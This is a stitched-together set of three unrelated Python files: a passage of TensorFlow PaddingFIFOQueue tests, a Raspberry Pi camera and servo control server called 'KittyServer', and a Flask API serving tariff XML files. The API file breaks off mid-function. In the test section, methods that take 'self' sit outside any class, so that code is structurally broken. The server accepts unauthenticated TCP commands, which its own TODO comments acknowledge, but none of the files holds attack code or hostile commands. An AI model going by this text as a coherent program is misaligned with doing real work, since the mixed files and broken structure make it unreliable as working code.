    q2 = data_flow_ops.PaddingFIFOQueue(
        1, dtypes_lib.float32, ((),), shared_name="shared_queue")

    q1_size_t = q1.size()
    q2_size_t = q2.size()

    self.assertEqual(q1_size_t.eval(), [1])
    self.assertEqual(q2_size_t.eval(), [1])

    self.assertEqual(q2.dequeue().eval(), [10.0])

    self.assertEqual(q1_size_t.eval(), [0])
    self.assertEqual(q2_size_t.eval(), [0])

    q2.enqueue((20.0,)).run()

    self.assertEqual(q1_size_t.eval(), [1])
    self.assertEqual(q2_size_t.eval(), [1])

    self.assertEqual(q1.dequeue().eval(), [20.0])

    self.assertEqual(q1_size_t.eval(), [0])
    self.assertEqual(q2_size_t.eval(), [0])
def testIncompatibleSharedQueueErrors(self):
  """Opening a shared queue with mismatched attributes raises op errors.

  Each pair below shares a name but differs in one attribute
  (capacity, dtypes, or shapes); creating the second must fail.
  """
  with self.cached_session():
    # Mismatched capacity.
    q_a_1 = data_flow_ops.PaddingFIFOQueue(
        10, dtypes_lib.float32, ((),), shared_name="q_a")
    q_a_2 = data_flow_ops.PaddingFIFOQueue(
        15, dtypes_lib.float32, ((),), shared_name="q_a")
    q_a_1.queue_ref.op.run()
    with self.assertRaisesOpError("capacity"):
      q_a_2.queue_ref.op.run()

    # Mismatched component dtypes.
    q_b_1 = data_flow_ops.PaddingFIFOQueue(
        10, dtypes_lib.float32, ((),), shared_name="q_b")
    q_b_2 = data_flow_ops.PaddingFIFOQueue(
        10, dtypes_lib.int32, ((),), shared_name="q_b")
    q_b_1.queue_ref.op.run()
    with self.assertRaisesOpError("component types"):
      q_b_2.queue_ref.op.run()

    # Scalar vs. non-scalar component shapes.
    q_c_1 = data_flow_ops.PaddingFIFOQueue(
        10, dtypes_lib.float32, ((),), shared_name="q_c")
    q_c_2 = data_flow_ops.PaddingFIFOQueue(
        10, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_c")
    q_c_1.queue_ref.op.run()
    with self.assertRaisesOpError("component shapes"):
      q_c_2.queue_ref.op.run()

    # Non-scalar vs. scalar component shapes.
    q_d_1 = data_flow_ops.PaddingFIFOQueue(
        10, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_d")
    q_d_2 = data_flow_ops.PaddingFIFOQueue(
        10, dtypes_lib.float32, ((),), shared_name="q_d")
    q_d_1.queue_ref.op.run()
    with self.assertRaisesOpError("component shapes"):
      q_d_2.queue_ref.op.run()

    # Same rank, different dimension.
    q_e_1 = data_flow_ops.PaddingFIFOQueue(
        10, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_e")
    q_e_2 = data_flow_ops.PaddingFIFOQueue(
        10, dtypes_lib.float32, shapes=[(1, 1, 2, 4)], shared_name="q_e")
    q_e_1.queue_ref.op.run()
    with self.assertRaisesOpError("component shapes"):
      q_e_2.queue_ref.op.run()

    # Different number of components.
    q_f_1 = data_flow_ops.PaddingFIFOQueue(
        10, dtypes_lib.float32, ((),), shared_name="q_f")
    q_f_2 = data_flow_ops.PaddingFIFOQueue(
        10, (dtypes_lib.float32, dtypes_lib.int32), ((), ()),
        shared_name="q_f")
    q_f_1.queue_ref.op.run()
    with self.assertRaisesOpError("component types"):
      q_f_2.queue_ref.op.run()
def testSelectQueue(self):
  """Enqueue/dequeue through a queue selected dynamically by index."""
  with self.cached_session():
    num_queues = 10
    qlist = list()
    for _ in xrange(num_queues):
      qlist.append(
          data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),)))
    # Enqueue/Dequeue into a dynamically selected queue
    for _ in xrange(20):
      index = np.random.randint(num_queues)
      q = data_flow_ops.PaddingFIFOQueue.from_list(index, qlist)
      q.enqueue((10.,)).run()
      self.assertEqual(q.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
  """Dequeuing via an out-of-range selector index must raise an error."""
  with self.cached_session():
    first_queue = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
    second_queue = data_flow_ops.PaddingFIFOQueue(15, dtypes_lib.float32, ((),))
    # Index 3 is outside the two-queue list.
    selected = data_flow_ops.PaddingFIFOQueue.from_list(
        3, [first_queue, second_queue])
    with self.assertRaisesOpError("is not in"):
      selected.dequeue().eval()
def _blockingDequeue(self, sess, dequeue_op):
  """Runs `dequeue_op`, expecting it to be cancelled by session close."""
  expected_cancellation = self.assertRaisesOpError("was cancelled")
  with expected_cancellation:
    sess.run(dequeue_op)
def _blockingDequeueMany(self, sess, dequeue_many_op):
  """Runs `dequeue_many_op`, expecting cancellation on session close."""
  expected_cancellation = self.assertRaisesOpError("was cancelled")
  with expected_cancellation:
    sess.run(dequeue_many_op)
def _blockingEnqueue(self, sess, enqueue_op):
  """Runs `enqueue_op`, expecting it to be cancelled by session close."""
  expected_cancellation = self.assertRaisesOpError("was cancelled")
  with expected_cancellation:
    sess.run(enqueue_op)
def _blockingEnqueueMany(self, sess, enqueue_many_op):
  """Runs `enqueue_many_op`, expecting cancellation on session close."""
  expected_cancellation = self.assertRaisesOpError("was cancelled")
  with expected_cancellation:
    sess.run(enqueue_many_op)
def testResetOfBlockingOperation(self):
  """Closing the session cancels all four kinds of blocked queue ops."""
  with self.cached_session() as sess:
    q_empty = data_flow_ops.PaddingFIFOQueue(5, dtypes_lib.float32, ((),))
    dequeue_op = q_empty.dequeue()
    dequeue_many_op = q_empty.dequeue_many(1)

    q_full = data_flow_ops.PaddingFIFOQueue(5, dtypes_lib.float32, ((),))
    sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
    enqueue_op = q_full.enqueue((6.0,))
    enqueue_many_op = q_full.enqueue_many(([6.0],))

    threads = [
        self.checkedThread(
            self._blockingDequeue, args=(sess, dequeue_op)),
        self.checkedThread(
            self._blockingDequeueMany, args=(sess, dequeue_many_op)),
        self.checkedThread(
            self._blockingEnqueue, args=(sess, enqueue_op)),
        self.checkedThread(
            self._blockingEnqueueMany, args=(sess, enqueue_many_op))
    ]
    for t in threads:
      t.start()
    time.sleep(0.1)
    sess.close()  # Will cancel the blocked operations.
    for t in threads:
      t.join()
def testBigEnqueueMany(self):
  """enqueue_many of 10 into a capacity-5 queue makes progress in stages.

  `enq_done` records the enqueue thread's progress: one entry when it
  starts, a second only after the whole enqueue_many completes.
  """
  with self.cached_session() as sess:
    q = data_flow_ops.PaddingFIFOQueue(5, dtypes_lib.int32, ((),))
    elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
    enq = q.enqueue_many((elem,))
    deq = q.dequeue()
    size_op = q.size()

    enq_done = []

    def blocking_enqueue():
      enq_done.append(False)
      # This will fill the queue and then block until enough dequeues happen.
      sess.run(enq)
      enq_done.append(True)

    thread = self.checkedThread(target=blocking_enqueue)
    thread.start()

    # The enqueue should start and then block.
    results = []
    results.append(deq.eval())  # Will only complete after the enqueue starts.
    self.assertEqual(len(enq_done), 1)
    self.assertEqual(sess.run(size_op), 5)

    for _ in range(3):
      results.append(deq.eval())

    time.sleep(0.1)
    # The enqueue is still blocked: only 9 of 10 elements fit so far.
    self.assertEqual(len(enq_done), 1)
    self.assertEqual(sess.run(size_op), 5)

    # This dequeue will unblock the thread.
    results.append(deq.eval())
    time.sleep(0.1)
    self.assertEqual(len(enq_done), 2)
    thread.join()

    for i in range(5):
      self.assertEqual(size_op.eval(), 5 - i)
      results.append(deq.eval())
      self.assertEqual(size_op.eval(), 5 - i - 1)

    self.assertAllEqual(elem, results)
def testBigDequeueMany(self):
  """dequeue_many(4) from a capacity-2 queue completes across enqueues."""
  with self.cached_session() as sess:
    q = data_flow_ops.PaddingFIFOQueue(2, dtypes_lib.int32, ((),))
    elem = np.arange(4, dtype=np.int32)
    enq_list = [q.enqueue((e,)) for e in elem]
    deq = q.dequeue_many(4)

    results = []

    def blocking_dequeue():
      # Will only complete after 4 enqueues complete.
      results.extend(sess.run(deq))

    thread = self.checkedThread(target=blocking_dequeue)
    thread.start()
    # The dequeue should start and then block.
    for enq in enq_list:
      # TODO(mrry): Figure out how to do this without sleeping.
      time.sleep(0.1)
      # The dequeue must not have produced anything yet.
      self.assertEqual(len(results), 0)
      sess.run(enq)

    # Enough enqueued to unblock the dequeue
    thread.join()
    self.assertAllEqual(elem, results)
def testDtypes(self):
  """Round-trips a batch through the queue for every supported dtype."""
  with self.cached_session() as sess:
    dtypes = [
        dtypes_lib.float32, dtypes_lib.float64, dtypes_lib.int32,
        dtypes_lib.uint8, dtypes_lib.int16, dtypes_lib.int8, dtypes_lib.int64,
        dtypes_lib.bool, dtypes_lib.complex64, dtypes_lib.complex128
    ]
    shape = (32, 4, 128)
    q = data_flow_ops.PaddingFIFOQueue(32, dtypes, [shape[1:]] * len(dtypes))

    input_tuple = []
    for dtype in dtypes:
      np_dtype = dtype.as_numpy_dtype
      np_array = np.random.randint(-10, 10, shape)
      if dtype == dtypes_lib.bool:
        np_array = np_array > 0
      elif dtype in (dtypes_lib.complex64, dtypes_lib.complex128):
        # sqrt of negatives yields complex values, exercising both parts.
        np_array = np.sqrt(np_array.astype(np_dtype))
      else:
        np_array = np_array.astype(np_dtype)
      input_tuple.append(np_array)

    q.enqueue_many(input_tuple).run()

    output_tuple_t = q.dequeue_many(32)
    output_tuple = sess.run(output_tuple_t)

    for (input_elem, output_elem) in zip(input_tuple, output_tuple):
      self.assertAllEqual(input_elem, output_elem)
def testUnknownRank(self):
  """Constructing a queue with an unknown-rank shape must be rejected."""
  unknown_rank_shape = tensor_shape.TensorShape(None)
  with self.assertRaisesRegexp(ValueError, "must have a defined rank"):
    data_flow_ops.PaddingFIFOQueue(32, [dtypes_lib.float32],
                                   [unknown_rank_shape])
class QueueFromListTest(test.TestCase):
  """Tests shape merging when selecting among queues with from_list."""

  def testQueueFromListShapes(self):
    which = constant_op.constant(1)

    def _cmp(expected, *shapes):
      # Builds one single-component queue per candidate shape and checks
      # that from_list merges them into `expected` (None = unknown rank).
      qs = [
          data_flow_ops.PaddingFIFOQueue(10, [dtypes_lib.float32],
                                         [tensor_shape.TensorShape(s)])
          for s in shapes
      ]
      s_expected = tensor_shape.TensorShape(expected)
      s = data_flow_ops.QueueBase.from_list(which, qs).shapes[0]
      if s_expected.ndims is None:
        self.assertEqual(s_expected.ndims, s.ndims)
      else:
        self.assertEqual(s_expected.as_list(), s.as_list())

    _cmp(None, [1, None], [None])
    _cmp([None], [1], [2])
    _cmp([1, None], [1, 1], [1, 2])
    _cmp([1, None], [1, 1], [1, None])
    _cmp([None, None], [None, 1], [1, None])
    _cmp([1], [1], [1], [1])
    _cmp([None], [1], [None], [1])
    _cmp(None, [1, None], [1], [1])

  def testQueueFromListShapesMultipleComponents(self):
    # Queues with (unknown, unknown), (unknown, fixed) and (fixed, fixed)
    # component shapes, used to check per-component merging below.
    q_u_u = data_flow_ops.PaddingFIFOQueue(
        10, [dtypes_lib.float32, dtypes_lib.int32],
        [tensor_shape.TensorShape([None]), tensor_shape.TensorShape([None])])
    q_u_f = data_flow_ops.PaddingFIFOQueue(
        10, [dtypes_lib.float32, dtypes_lib.int32],
        [tensor_shape.TensorShape([None]), tensor_shape.TensorShape([1, 2])])
    q_f_f = data_flow_ops.PaddingFIFOQueue(
        10, [dtypes_lib.float32, dtypes_lib.int32],
        [tensor_shape.TensorShape([3, 4]), tensor_shape.TensorShape([1, 2])])
    which = constant_op.constant(1)

    s_cmp_1 = data_flow_ops.QueueBase.from_list(which,
                                                [q_u_u, q_u_u, q_u_u]).shapes
    self.assertEqual([1, 1], [x.ndims for x in s_cmp_1])
    self.assertEqual([None, None], [x.as_list()[0] for x in s_cmp_1])

    s_cmp_2 = data_flow_ops.QueueBase.from_list(which,
                                                [q_u_u, q_u_u, q_u_f]).shapes
    self.assertEqual([1, None], [x.ndims for x in s_cmp_2])
    self.assertEqual([None], s_cmp_2[0].as_list())

    s_cmp_3 = data_flow_ops.QueueBase.from_list(which, [q_f_f, q_f_f]).shapes
    self.assertEqual([2, 2], [x.ndims for x in s_cmp_3])
    self.assertEqual([[3, 4], [1, 2]], [x.as_list() for x in s_cmp_3])
# Run the full test suite when executed as a script.
if __name__ == "__main__":
  test.main()
|
server.py | #!/usr/bin/python3
import socket
import struct
import threading
import picamera
import camera
import time
import datetime
#TODO : need to redo following code
from pwm import Motors
from common import *
from debug import *
from comms_packet_structure import *
from external_processes import *
BUFFER_SIZE = 20
BUFFER_FILENAME = 'buffer.h264'
class KittyServer():
  """Single-client TCP server for the camera/motor surveillance rig.

  Lifecycle per client: initialize() -> connectionSequence() -> rx thread
  services packets -> on disconnect, deinitialize() and loop again.
  """

  def __init__(self, ip, comms_port):
    self.ip = ip
    self.comms_port = comms_port
    self.running = False

  # Wrapper for the debug print call, with the server module as argument
  def PRINT(self, string, level=0):
    debugPrint(string, DEBUG_MODULE_SERVER, level)

  # This actually does the initialization.
  # initializes threads. the starting of them is done in run()
  # After a disconnected client, one should terminateConnections,
  # deinitialize, and initialize again.
  def initialize(self):
    self.commsServer = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    self.commsServer.bind((self.ip, self.comms_port))
    # ServerRxThread and TxThread for the communication of commands, coordinates, etc.
    self.serverRxThread = threading.Thread(target=self.ServerRxThread)
    self.serverTxThread = threading.Thread(target=self.ServerTxThread)
    self.connectionEstablished = False
    self.clientConnection = {}
    self.cameraX = 45
    self.cameraY = 45
    self.motors = Motors()
    self.PRINT("Initialized")

  # Joins threads, destroys camera and motor objects. Add anything else if you think of any
  def deinitialize(self):
    # join() on a thread that was never started raises RuntimeError; the
    # rx thread only has an ident once start() has been called.
    if self.serverRxThread.ident is not None:
      self.serverRxThread.join()
    # self.serverTxThread.join()
    del(self.motors)
    self.PRINT("Deinitialized")

  # This thread continuously receives data, passes to processInput
  # TODO: Currently there's one size in receiving. have this
  def ServerRxThread(self):
    self.PRINT("Server Rx thread started")
    rxBuf = []
    while (self.connectionEstablished):
      try:
        rxData = self.clientConnection['commsConn'].recv(4)
        # An empty read means the peer closed the socket; handle that
        # before touching the data.
        if (rxData == None or rxData == [] or len(rxData) == 0):
          print("[!] rxData == None. Terminating connection")
          self.terminateConnections()
          continue
        rxBuf.extend(rxData)
        print("Received data", [hex(i) for i in rxData])
        # If we received the magic number, we can assume we have
        # a full packet in our hands. process it.
        if (rxData == bytes(COMMS_PACKET_MAGIC)):
          self.processInput(rxBuf)
          rxBuf = []
      except Exception as e:
        print("[!] ERROR!")
        print(e)
        print("[!] TERMINATING CONNECTION")
        self.terminateConnections()
    self.PRINT("Server Rx thread ending")

  def ServerTxThread(self):
    # TODO: outgoing traffic is not implemented yet.
    pass

  # Connect to client thru COMMS and then VIDEO connections.
  # TODO: have this sequence be an exchange between the client and server.
  # TODO: have some ssl key check trickery
  def connectionSequence(self):
    self.PRINT("Waiting for connection on port %s:%d" % (self.ip, self.comms_port))
    self.commsServer.listen(1)
    (conn, (ip, port)) = self.commsServer.accept()
    self.clientConnection = {
      "ip" : ip,
      "commsConn": conn,
      "videoConn": None,
      "running" : False
    }
    self.PRINT("Comms port connection established with %s" % ip)
    self.connectionEstablished = True
    # TODO # add security measures before opening up video server
    # OR just have a better secure handshake here
    return True

  # Terminate and close everything related to both VIDEO and COMMS connections/sockets
  def terminateConnections(self):
    if (self.clientConnection['commsConn'] != None):
      self.clientConnection['commsConn'].close()
      self.clientConnection['commsConn'] = None
    self.clientConnection['running'] = False
    self.connectionEstablished = False
    self.PRINT('Connection with %s terminated' % self.clientConnection['ip'])

  # Process commands received from the COMMS_CONNECTION
  # Packet types defined in comms_packet_structure.py
  def processInput(self, data):
    decodedPacket = DecodeRawCommsPacket(bytes(data))
    # PRINT takes a single message string; format the packet into it
    # (a second positional argument would be interpreted as `level`).
    self.PRINT('Processed packet: %s' % (decodedPacket,))
    if (decodedPacket['cmd_id'] == CommsPacketType.CMD_CAMERA_ANGLE_CHANGED.value):
      payload = decodedPacket['payload'][0:2]  # rest of the bytes are padding bytes
      try:
        newX, newY = struct.unpack('BB', payload)
      except Exception as e:
        print(e)
        print(data)
        return
      # 'BB' unpacks unsigned bytes (0..255), so the lower-bound clamp
      # is purely defensive; the upper bound limits the servo range.
      if (newX < 0):
        newX = 0
      elif (newX > 180):
        newX = 180
      if (newY < 0):
        newY = 0
      elif (newY > 180):
        newY = 180
      self.motors.setX(newX)
      self.motors.setY(newY)
      self.PRINT("NEW X: %d, NEW Y: %d" % (newX, newY))
    if (decodedPacket['cmd_id'] == CommsPacketType.CMD_START_RECORDING_VIDEO.value):
      # Name the recording after the current timestamp.
      filename = datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S")
      ret = EXT_runRaspicam(filename=filename, time_ms=30 * 1000)
      self.PRINT('RUNNING RASPICAM ret: %s' % (ret,))
    if (decodedPacket['cmd_id'] == CommsPacketType.CMD_STOP_RECORDING_VIDEO.value):
      pass
    if (decodedPacket['cmd_id'] == CommsPacketType.CMD_INITIATE_VIDEO_SERVER.value):
      pass

  # Main loop of the server program. The class itself doesnt jump to this function
  def run(self):
    self.running = True
    self.PRINT("Starting kitty server")
    # MAIN LOOP
    while self.running:
      self.initialize()
      if (not self.connectionSequence()):
        self.PRINT("[!] Connection sequence failed.")
        self.deinitialize()  # TODO make this prettier. we dont need to deinit every time conn sequence fails
        continue
      # Start comms threads
      self.serverRxThread.start()
      #self.serverTxThread.start() # TODO # Eventually implement tx stuff
      # Wait while we're connected to a client; sleep so the wait does
      # not busy-spin a full CPU core.
      while self.clientConnection['running']:
        time.sleep(0.1)
      # When a disconnect occurs, deinitialize
      self.deinitialize()
      time.sleep(5)
    self.PRINT("Shutting down server")
def main():
  # Entry point: print the banner, then run the server loop forever.
  print("K i t t y S u r v e i l l a n c e - Server - v%s" % (VERSION))
  server = KittyServer(SERVER_IP_ADDR, COMMS_IP_PORT)
  server.run()


if __name__ == '__main__':
  main()
|
taricapi.py | from gevent import monkey # noqa: E402 # pylint: disable=C0411, C0412, C0413
monkey.patch_all() # noqa: E402 # pylint: disable=C0411, C0413
import click
import datetime
import hashlib
import io
import json
from logging.config import dictConfig
import re
import signal
import sys
import threading
import uuid
from botocore.exceptions import ClientError
from elasticapm.contrib.flask import ElasticAPM
from flask import Flask, render_template, make_response, request, Response
from flask.logging import create_logger
from gevent.pywsgi import WSGIServer
import gevent
from lxml import etree
import requests
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
from apifiles3 import write_file
from apifiles3 import remove_taric_file
from apifiles3 import remove_temp_taric_file
from apifiles3 import rename_taric_file
from apifiles3 import save_temp_taric_file
from apifiles3 import stream_taric_file
from apifiles3 import get_taric_index_file
from apifiles3 import get_taric_filepath
from apifiles3 import get_file_list
from apifiles3 import get_file_size
from apifiles3 import read_file
from apifiles3 import file_exists
from apifiles3 import md5
from apifiles3 import modification_date
from config import (
API_ROOT,
APIKEYS,
APIKEYS_UPLOAD,
PORT,
LOGGING,
NUM_PROXIES,
REQUIRE_AUTH_FOR_READS,
SENTRY_DSN,
ELASTIC_APM_TOKEN,
ELASTIC_APM_URL,
ENVIRONMENT,
GA_TRACKING_ID,
GA_ENDPOINT,
)
# Use apifile for file system, apifiles3 for AWS S3
# Configure logging before the Flask app is created so it picks up the config.
dictConfig(LOGGING)
app = Flask(__name__, static_url_path="/static", static_folder="static")
logger = create_logger(app)
# -----------------------
# HTTP HEADERS / API KEYS
# -----------------------
def get_apikey(request):
    """Return the X-API-KEY header value, or "" when absent/empty."""
    apikey = request.headers.get("X-API-KEY") or ""
    if apikey:
        logger.info("Api key is in header")
    else:
        logger.info("No api key in header")
    return apikey
def get_remoteaddr(request):
    """Return the client address chain, keeping at most NUM_PROXIES entries."""
    forwarded = request.environ.get("HTTP_X_FORWARDED_FOR")
    if forwarded is None:
        logger.info("Remote addresses are %s", request.environ["REMOTE_ADDR"])
        addrs = request.environ["REMOTE_ADDR"].split(",")
    else:
        logger.info("Remote addresses are %s", forwarded)
        addrs = forwarded.split(",")
    if len(addrs) > NUM_PROXIES:
        # Only the rightmost, proxy-appended entries are trustworthy; anything
        # beyond NUM_PROXIES could have been supplied by the client.
        logger.warning("Additional remote addresses stripped (possible spoofing)")
        addrs = addrs[-NUM_PROXIES:]
    return addrs
def in_apikeys(apikey):
    """True when the SHA-256 hex digest of *apikey* is a configured read key."""
    digest = hashlib.sha256(apikey.encode("ascii")).hexdigest()
    return digest in APIKEYS
def in_apikeys_upload(apikey):
    """True when the SHA-256 hex digest of *apikey* is a configured upload key."""
    digest = hashlib.sha256(apikey.encode("ascii")).hexdigest()
    return digest in APIKEYS_UPLOAD
def is_auth(request):
    """Read-access check: open access unless REQUIRE_AUTH_FOR_READS is set."""
    if REQUIRE_AUTH_FOR_READS:
        return in_apikeys(get_apikey(request))
    return True
def is_auth_upload(request):
    """Upload-access check: the caller's API key must be an upload key."""
    return in_apikeys_upload(get_apikey(request))
# ---------------------------
# URL Parameter validation
# Dates as ISO8601 YYYY-MM-DD
# Files as YYSSSS
# ---------------------------
def is_valid_date(date):
    """Match an ISO8601 calendar date (YYYY-MM-DD); returns a match or None."""
    date_re = r"^\d{4}-\d\d-\d\d$"
    return re.match(date_re, date)
def is_valid_datetime(date):
    """Match YYYY-MM-DD optionally followed by Thh:mm:ss[.mmm]."""
    datetime_re = r"^\d{4}-\d\d-\d\d(T\d\d:\d\d:\d\d(\.\d\d\d)?)?$"
    return re.match(datetime_re, date)
def is_valid_seq(seq):
    """Match a delta sequence id: exactly six digits (YYSSSS)."""
    seq_re = r"^\d{6}$"
    return re.match(seq_re, seq)
def is_virus_checked(file):
    """Placeholder virus scan; currently accepts every upload.

    TODO: integrate a real scanner — until then this always returns True.
    """
    # TODO
    return True
def is_schema_validated(xmlfile):
    """Validate the stored file *xmlfile* against the taric3 XSD.

    Returns True when the content parses as XML and conforms to taric3.xsd,
    False otherwise.  Parse failures are logged and reported as False, never
    raised to the caller.
    """
    logger.debug("VALIDATING %s", xmlfile)
    xsd_doc = etree.parse("taric3.xsd")
    xsd = etree.XMLSchema(xsd_doc)
    try:
        xml = etree.parse(io.BytesIO(read_file(xmlfile)))
    except Exception:  # pylint: disable=W0703
        logger.info("Unable to parse file as XML")
        return False
    # Validate once and reuse the result; the previous code ran the schema
    # validation twice (once for the branch, once for the return value).
    valid = xsd.validate(xml)
    if not valid:
        logger.info("XML Failed validation")
        logger.debug("%s", xsd.error_log)
    else:
        logger.info("XML validates against taric3 schema")
    return valid
# ------------------
# Create index entry
# ------------------
def create_index_entry(seq):
    """Build the master-index dict for delta *seq*.

    Returns {"id", "issue_date", "url", "md5", "size"} for the stored file.
    """
    # Resolve the backing file path once instead of three separate lookups
    # (each lookup may hit S3 metadata via the apifiles3 helpers).
    filepath = get_taric_filepath(seq)
    return {
        "id": int(seq),
        "issue_date": modification_date(filepath),
        "url": API_ROOT + "taricfiles/" + seq,
        "md5": md5(filepath),
        "size": get_file_size(filepath),
    }
# ----------------
# Google Analytics
# ----------------
def _send_to_google_analytics(
    requester_ip, request_host, request_path, request_headers
):
    """Record one pageview hit with Google Analytics (Measurement Protocol)."""
    logger.debug("Sending to Google Analytics %s: %s...", request_host, request_path)
    payload = {
        "v": "1",
        "tid": GA_TRACKING_ID,
        "cid": str(uuid.uuid4()),  # anonymous client id per hit
        "t": "pageview",
        "uip": requester_ip,
        "dh": request_host,
        "dp": request_path,
        "ds": "public-tariffs-api",
        "dr": request_headers.get("referer", ""),
        "ua": request_headers.get("user-agent", ""),
    }
    requests.post(GA_ENDPOINT, data=payload)
    logger.info("sent to ga")
# --------------------------------
# Rebuild master file index (JSON)
# --------------------------------
def rebuild_index(nocheck):
    """Recreate the master JSON index from the stored delta files.

    Runs when the index file is missing, or unconditionally when *nocheck*
    is True.  TEMP_* leftovers found while scanning are deleted instead of
    being indexed; non-taric filenames are ignored.
    """
    if not file_exists(get_taric_index_file()) or nocheck:
        logger.info("*** Rebuilding file index... ***")
        entries = []
        files = get_file_list(None)
        logger.info("%s", files)
        for item in files:
            # TODO (possibly) Add Metadata generation -> then could have api /taricfilemd/...
            # TODO - combine with individual update_index..
            name = item["Key"]
            name = name[name.rindex("/") + 1:]  # strip the folder prefix
            logger.info("Found file %s", name)
            if name.startswith("TEMP_"):
                logger.info("Removing temporary file %s", name)
                # drop the TEMP_ prefix and the .xml extension
                remove_temp_taric_file(name[5:-4])
            elif is_valid_seq(name[:-4]):  # ignore non taric files
                entries.append(create_index_entry(name[:-4]))
        logger.debug("%s delta files listed after update", str(len(entries)))
        # persist updated index
        write_file(get_taric_index_file(), json.dumps(entries))
        logger.info("Index rebuild complete")
@app.route("/api/v1/rebuildindex", methods=["POST"])
def rebuild_index_controller():
    """POST endpoint kicking off a background index rebuild; replies 202."""
    if not is_auth_upload(request):
        logger.info("API key not provided or not authorised")
        return Response("403 Unauthorised", status=403)
    logger.debug("Starting thread to rebuild index.")
    worker = threading.Thread(target=rebuild_index, args=[True])
    worker.start()
    return Response("202 index is being rebuilt", status=202)
# -------------------------------
# Update master file index (JSON)
# -------------------------------
def update_index(seq):
    """Add or refresh the index entry for delta *seq* and persist the index.

    If an entry with the same id already exists (file overwritten) it is
    replaced in place; otherwise a new entry is appended.
    """
    all_deltas = json.loads(read_file(get_taric_index_file()))
    logger.debug(
        "%s delta files listed in %s", str(len(all_deltas)), get_taric_index_file()
    )
    # TODO (possibly) Add Metadata file generation -> then could have api /taricfilesmd/...
    # if the file was overwritten, just update the index, else append
    existing = [d for d in all_deltas if d["id"] == int(seq)]
    if existing:
        logger.info("File %s overwritten", seq)
        # enumerate replaces the hand-maintained counter of the old code
        for i, d in enumerate(all_deltas):
            logger.debug("%s", d)
            if d["id"] == int(seq):
                all_deltas[i] = create_index_entry(seq)
    else:
        all_deltas.append(create_index_entry(seq))
    logger.debug("%s delta files listed after update", str(len(all_deltas)))
    # persist updated index
    write_file(get_taric_index_file(), json.dumps(all_deltas))
# ---------------------------------------------
# index page - could be used for pings / checks
# ---------------------------------------------
@app.route("/check")
def check():
    """Diagnostic page echoing the caller's API key and address chain."""
    logger.debug("%s", request.headers)
    logger.debug("%s", request.environ)
    addr_chain = " ".join(get_remoteaddr(request))
    message = "Request from " + get_apikey(request) + " @ " + addr_chain
    return render_template("check.html", message=message)
@app.route("/healthcheck")
def healthcheck():
    """Health endpoint: static pingdom-style XML body, never cached."""
    return Response(
        """
        <?xml version="1.0" encoding="UTF-8"?>
        <pingdom_http_custom_check>
            <status>OK</status>
        </pingdom_http_custom_check>
        """,
        status=200,
        headers={
            "Content-Type": "text/xml",
            # Probes must always hit the live app, never an intermediary cache.
            "Cache-Control": "no-cache, no-store, must-revalidate",
        },
    )
@app.route("/")
def hello():
    """Landing page: renders the static index template."""
    return render_template("index.html")
# --------------------------------------------------------------------------------------------
# API to retrieve list of delta files (for a date or defaults to yesterday to get latest file)
# NB using today would provide files loaded today
# but no guarantee that the list may change (i.e. extend) later due to further files
# --------------------------------------------------------------------------------------------
@app.route("/api/v1/taricdeltas/<date>", methods=["GET"])
@app.route("/api/v1/taricdeltas/", defaults={"date": ""}, methods=["GET"])
@app.route("/api/v1/taricdeltas", defaults={"date": ""}, methods=["GET"])
def taricdeltas(date):
    """List index entries whose issue_date falls on *date*.

    Defaults to yesterday when no date is supplied — files loaded today may
    still be extended later, so yesterday is the newest stable day.
    """
    if not date:
        yesterday = datetime.datetime.now() - datetime.timedelta(days=1)
        date = yesterday.strftime("%Y-%m-%d")
        logger.debug("defaulted date to %s", date)
    if not is_valid_date(date):
        logger.debug("date is invalid")
        return Response("Bad request [invalid date] (400)", status=400)
    if not is_auth(request):
        logger.debug("API key not provided or not authorised")
        return Response("403 Unauthorised", status=403)
    logger.debug("date is %s", date)
    # Every uploaded Taric file is recorded in the index; filter the index
    # entries down to those issued on the requested day.
    index_entries = json.loads(read_file(get_taric_index_file()))
    logger.debug(
        "%s delta files listed in %s", str(len(index_entries)), get_taric_index_file()
    )
    matches = [d for d in index_entries if d["issue_date"].startswith(date)]
    if not matches:
        logger.debug("No delta files available for date %s", date)
        return Response("404 Not found", status=404)
    logger.debug("%s delta files for date %s", str(len(matches)), date)
    response = make_response(json.dumps(matches))
    response.headers.set("Content-Type", "application/json")
    return response
# -----------------------------------------
# API to retrieve contents of specific file
# -----------------------------------------
@app.route("/api/v1/taricfiles/<seq>", methods=["GET"])
@app.route("/api/v1/taricfiles", defaults={"seq": ""}, methods=["GET"])
def taricfiles(seq):
    """Stream the XML contents of delta file *seq*."""
    if not is_auth(request):
        logger.debug("API key not provided or not authorised")
        return Response("403 Unauthorised", status=403)
    if not is_valid_seq(seq):
        logger.debug("seq is invalid")
        return Response("400 Bad request [invalid seq]", status=400)
    stream = stream_taric_file(seq)
    if stream is None:
        logger.debug("Requested file not found %s", seq)
        return Response("404 Taric file does not exist", status=404)
    # Explicit Content-Length lets clients show progress on large deltas.
    headers = {"Content-Length": get_file_size(get_taric_filepath(seq))}
    return Response(stream, mimetype="text/xml", headers=headers)
# -----------------------------------------
# API to remove contents of specific file
# -----------------------------------------
@app.route("/api/v1/taricfiles/<seq>", methods=["DELETE"])
@app.route("/api/v1/taricfiles", defaults={"seq": ""}, methods=["DELETE"])
def taricfiles_delete(seq):
    """Delete delta file *seq* and trigger a background index rebuild."""
    if not is_auth_upload(request):
        logger.debug("API key not provided or not authorised")
        return Response("403 Unauthorised", status=403)
    if not is_valid_seq(seq):
        logger.debug("seq is invalid")
        return Response("400 Bad request [invalid seq]", status=400)
    logger.info("attempt to remove taric file %s", seq)
    try:
        remove_taric_file(seq)
    except ClientError as e:
        # Bug fix: ClientError is not subscriptable — the AWS error code lives
        # in e.response — and a failed delete must not report HTTP 200.
        return Response("400 Error %s" % e.response["Error"]["Code"], status=400)
    logger.debug("Starting thread to rebuild index.")
